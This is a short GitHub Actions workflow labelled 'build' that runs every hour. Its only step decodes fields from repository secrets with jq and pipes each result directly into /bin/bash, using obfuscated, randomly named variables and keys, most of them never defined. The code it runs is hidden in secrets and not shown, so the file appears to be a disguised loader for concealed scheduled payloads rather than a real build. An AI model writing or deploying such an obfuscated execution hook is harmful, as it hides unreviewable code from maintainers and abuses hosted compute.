name: wutingfang2345
on:
  workflow_dispatch:
  schedule:
    - cron: '14 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wutingfang2345
        env:
          edf5: ${{ secrets.edf5 }}
        run: |
          echo $edf5 | jq -r .n92571 | /bin/bash
          echo $fltjs44899 | jq -r .ppqgk90713 | /bin/bash
          echo $sfj7 | jq -r .ixq554 | /bin/bash
          echo $dw87389 | jq -r .hurnw3403 | /bin/bash
          echo $orr85493 | jq -r .sxcq15 | /bin/bash
          echo $b0 | jq -r .qlqpo704 | /bin/bash
          echo $hloq92801 | jq -r .mlia99647 | /bin/bash

